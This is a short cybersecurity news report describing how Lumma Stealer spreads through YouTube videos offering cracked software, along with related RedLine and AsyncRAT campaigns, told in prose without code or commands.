Threat actors are using YouTube videos featuring cracked software as a way to distribute a malware called Lumma. The videos often offer installation guides for cracked applications and include malicious URLs that are shortened using services like TinyURL and Cuttly. This tactic is not new, as similar attack chains have been observed in the past delivering stealers, clippers, and crypto miner malware.
In the latest attack documented by Fortinet, users searching for cracked versions of video editing tools like Vegas Pro on YouTube are directed to click on a link in the video’s description, which leads to the download of a fake installer hosted on MediaFire. Once unpacked, the ZIP installer contains a Windows shortcut (LNK) that pretends to be a setup file. This LNK file downloads a .NET loader from a GitHub repository, which then loads the Lumma Stealer payload after performing various anti-virtual machine and anti-debugging checks.
Lumma Stealer, which has been available for sale on underground forums since late 2022, is capable of collecting sensitive data and sending it to a server controlled by the threat actor. This attack method is similar to stream-jacking attacks on YouTube reported by Bitdefender, where cybercriminals take over high-profile accounts through phishing attacks and deploy the RedLine Stealer malware to steal login credentials and session cookies.
In addition, a campaign using phishing lures has been discovered that downloads an obfuscated JavaScript file to drop the remote access trojan AsyncRAT. The targets of this campaign are carefully selected, with some managing key infrastructure in the United States.